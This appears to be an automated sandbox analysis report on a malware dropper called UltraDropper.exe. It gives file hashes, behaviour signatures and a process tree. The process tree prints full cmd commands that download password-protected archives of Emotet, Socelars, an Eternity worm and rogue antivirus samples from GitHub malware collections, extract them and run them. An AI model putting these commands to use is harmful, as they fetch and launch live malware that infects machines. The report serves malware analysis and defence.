Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    08-11-2024 17:23

General

  • Target

    UltraDropper.exe

  • Size

    60KB

  • MD5

    b2155129ecaf078020239d57841643a6

  • SHA1

    ac3231da4f91bf288f398d7923d717812e1207ca

  • SHA256

    46e78d76c9c3c0305c6a547525b3ea26f9a20e10fcf534a3886921304a5991b4

  • SHA512

    165557e7f186f3a5b2ed6231cc27f86974bf7d1ee539faf963a092fb6d9012191ad37d4f1ce9de8a69fc1ff37135a0f76898c1d91a8d23b328db49f9e9c4c0c3

  • SSDEEP

    768:syT1o1uw3klvq3fWFRsmP1pNXT4Cabs3l+xdTqOf70QuVORH:syNw5fSDz+s3ls8u70QuVs

Score
3/10

Malware Config

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe
    "C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2544
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2548
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2556
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2024
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1628
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2036
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\emotet.dll"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2476
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\emotet.dll"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2864
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1376
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1576
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2844
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2860
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\Worm (1).exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2552-0-0x0000000000FD0000-0x0000000000FE4000-memory.dmp

    Filesize

    80KB

  • memory/2552-2-0x0000000000FD0000-0x0000000000FE4000-memory.dmp

    Filesize

    80KB